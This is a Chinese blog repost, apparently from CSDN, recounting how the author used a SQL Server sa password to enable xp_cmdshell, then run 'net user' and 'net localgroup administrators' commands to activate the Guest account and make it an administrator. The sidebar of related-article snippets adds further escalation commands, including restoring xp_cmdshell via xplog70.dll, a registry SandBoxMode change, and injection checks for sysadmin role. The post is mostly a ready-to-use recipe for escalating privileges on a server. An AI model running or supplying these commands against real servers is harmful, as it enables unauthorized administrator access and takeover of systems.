一次利用MSSQL的SA账户提权获取服务器权限

最新推荐文章于 2024-08-26 14:30:00 发布

weixin_30546933

最新推荐文章于 2024-08-26 14:30:00 发布

阅读量518

点赞数

CC 4.0 BY-SA版权

文章标签：数据库

原文链接：http://www.cnblogs.com/ixysy/p/4988533.html

本文通过实战案例介绍如何利用SQL Server sa账号权限进行提权操作，包括开启xp_cmdshell存储过程及利用其执行系统命令实现用户添加与权限提升。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

遇到小人，把服务器整走了

自己手里只有sql server的sa账号密码

模糊记起之前用这个账户提权读取文件的事

百度之，发现相关信息一堆堆

各种工具也用了不少发现不是语法错误就是权限不够

无奈之下装了sql server r2直接来操作

顺利连接上去，看到有master这个库。

直奔重点去

这里要用到的就是xp_cmdshell这个存储过程，算是mssql有sa权限下的提权利器，不过有经验的管理员一般都会用各种牛逼的方法去禁止普通用户使用它

尝试用正常的方法打开xp_cmdshell：

EXEC sp_configure 'show advanced options', 1; 
RECONFIGURE; 
EXEC sp_configure 'xp_cmdshell', 1; 
RECONFIGURE; 
exec sp_configure

看来运气还是不错滴，xp_cmdshell顺利打开了。然后就可以直接执行cmd命令了：

exec xp_cmdshell ' net user Guest Qwer123456789'
exec xp_cmdshell ' net user Guest /active:yes'
exec xp_cmdshell 'net localgroup administrators Guest /add'

算是顺利

没什么障碍

最后附上一张远程登录的截图

转载于:https://www.cnblogs.com/ixysy/p/4988533.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30546933

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Windows提权—数据库提权-mysql提权&mssql提权&Oracle数据库提权

网络空间安全学习

04-01

1571

Windows提权-数据库提权-MySQL提权-MSSQL提权-Oracle提权 MySQL UDF提权、反弹shell、启动项、mof提权 MSSQL系统函数-使用系统函数提权 Oracle 数据库提权可使用Oracle shell工具进行操作

第60天-权限提升-MY&MS&ORA 等 SQL 数据库提权

MCTSOG的博客

04-29

2254

思维导图权限提升 数据库提权在利用系统溢出漏洞无果的情况下，可以采用数据库进行提权，但需要知道数据库提权的前提条件：服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外，其他数据库基本都存在数据库提权的可能。 数据库应用提权在权限提升中的意义 WEB 或本地环境如何探针数据库应用 数据库提权权限用户密码收集等方法目前数据库提权对应的技术及方法等知识点提权流程服务探针---->信息收集----->提权利用----->获取权限 数据库端口号关系型数

参与评论您还未登录，请先登录后发表或查看评论

MSSql 提权

07-23

自己总结的MSSql提权语句希望对大家有帮助

SA提权

weixin_33946020的博客

01-23

284

遇到一个SA注入点，拿到了webshell 注入点可以直接执行命令开了3389，能连接上问题是始终加不上用户！ net user命令可以执行 net user test test /add 提示“拒绝访问”！ net user user pass 想更改用户密码或者添加用户的时候就会提示“拒绝访问” 上传过本地的cmd.exe、net.exe、net...

MsSQL高级注入命令提权

11-15

527

一、基本信息搜集 1.注入点类型的判断 and exists (select * from sysobjects) 2.注入点权限判断 and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员 and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限 and 1=(select...

利用MSSQL模拟提权

Ms08067安全实验室

06-19

480

数据库提权--MSSQL

qq_45936617的博客

10-11

2229

MSSQL是微软公司开发的数据库，又称为sql server数据库服务器。在基于微软开发的IIS中间件服务器开发的网站，通常使用的就是MSSQL数据库。常见的MSSQL数据库的提权方式有 xp_cmdshell提权、sp_oacrate提权、沙盒提权及JOB提权等，本文学习的是三种提权方式利用原理、利用条件以利用方法。

数据库提权（实战案例）

2201_75341517的博客

06-13

1956

本文主要介绍常见数据库如何进行提权操作，如mysql（mof，udf，启动项），mssql，orcale数据库，

Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权

z2560088的博客

02-13

4512

针对环境 windows有两种环境，一种是web网站拿到的webshell环境，一般是低权限的用户，（jsp除外，拿到webshell就是system权限）另一种是本地的环境，可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。提权方法 1.win溢出漏洞（如何判断类型和利用）信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap，Wes，WindowsVulnScan 对比,exp 在哪里获取？利用wes进行补丁筛选 2.数据库提权 ...

得到Sa密码后-MsSql提权命令

weixin_34335458的博客

07-10

319

　　一系统Shell 　　恢复xp_cmdshell 　　Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 　　使用xp_cmdshell添加用户　　exec xp_cmdshell 'net user user1 /add' 　　利用OLE对象接口，SQL SERVE...

MSSQL如果添加SA帐号

02-13

MSSQL如果添加SA帐号,在MSSQL执行工具下打开该文件,修改密码执行脚本

SA权限沙合模式提权方法

收集盒 Book box

05-08

631

sa下删除xp_cmdshell和xplog70.dll时候的一种办法，不算新的了，也被一些人不断的再次提出来，为了方便自己记忆再写出来，在这种情况下，要执行命令，条件是要有xp_regwrite。 首先开启沙盘模式： exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1 然后

【汇总】数据库提权（mysql、mssql）

weixin_30527551的博客

08-19

236

日期：2018-04-03 11:46:45 作者：Bay0net 介绍：利用 mssql 的 sa 账号提权、利用 MySQL 的 UDF 提权 0x01、mssql 提权恢复 xp_cmdshell 几个命令 # 查看是否存在 xp_cmdshell（返回非 0 即存在） select count(*) from master.dbo.sysobjects wh...

数据库注入提权总结（一）

Palpitate_LL的博客

08-26

1153

•若前面的查询结果不为空，则返回两次查询的值：•若前面的查询结果为空，则只返回union查询的值：•关键字union select•需要字段数对应常用Payload：# 查询表名# 查询字段名。

mysql 2008提权_通过Mssql提权的几种姿势

weixin_33134753的博客

02-26

368

本文记录针对SQL Server数据库，在拿到shell之后进行提权的5种方法。一、 xp_cmdshell提权上面的数据库连接需要知道sa的密码，连接之后，在下面的sql命令处执行：exec xp_cmdshell 'net user aaa aaa /add && net localgroup administrators aaa /add'就能成功的创建一个账户aaa并且加到...

sqlserver提权失败_mssql提权遇到CreateProcess' 失败，错误代码: '5'。

weixin_39897267的博客

12-23

1658

方法一：mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败，错误代码: '5'，两种解决办法。原因不说了，一般都是cmd.exe被限制权限了，system用户没有权限，解决方法2种：1、替换shift文件(在开启33...

服务器管理员账号sa,一次利用MSSQL的SA账户提权获取服务器权限

weixin_39542742的博客

07-29

1105

遇到小人，把服务器整走了自己手里只有sql server的sa账号密码模糊记起之前用这个账户提权读取文件的事百度之，发现相关信息一堆堆各种工具也用了不少发现不是语法错误就是权限不够无奈之下装了sql server r2直接来操作顺利连接上去，看到有master这个库。直奔重点去这里要用到的就是xp_cmdshell这个存储过程，算是mssql有sa权限下的提权利器，不过有经验的管理员一般都会用各...

MSSQL渗透测试

山兔的博客

02-27

1448

拿到目标的IP地址，我们先对IP地址进行信息收集，收集信息资产，同时使用nmap对IP地址进行扫描从扫描的结果中，我们能知道目标服务器是windows操作系统，使用的是mssql数据库，数据库端口对外开放，我们先对1433端口进行爆破没有扫描出账号密码，看一下其它的端口有没有可以利用的地方这个135端口是高危端口，我们去网上搜索一下相关利用资料，发现这个端口在之前涉及到一个冲击波病毒，这个端口有登录点，可以进行爆破，我这里使用NTscan进行爆破，没有跑出来。

Windows权限提升 —SQL Server/MSSQL数据库提权

剁椒鱼头没剁椒的博客

03-21

2920

在之前的Windows权限提升—MySQL数据库提权中已经介绍了关于数据库方面的权限提升，同时在Windows权限提升—溢出提权的时候，简要的介绍了关于Windows提权方面整体的流程与方式，这里就不再赘述，直接进行Windows权限提升—SQL Server/MSSQL数据库的提权。SQL Server与MSSQL其实就是一个东西，只是叫法不同。Windows权限提升—MySQL数据库Windows权限提升—溢出提权。

4.写出在mysql和sqlserver中的获取主机权限的sql注入语句。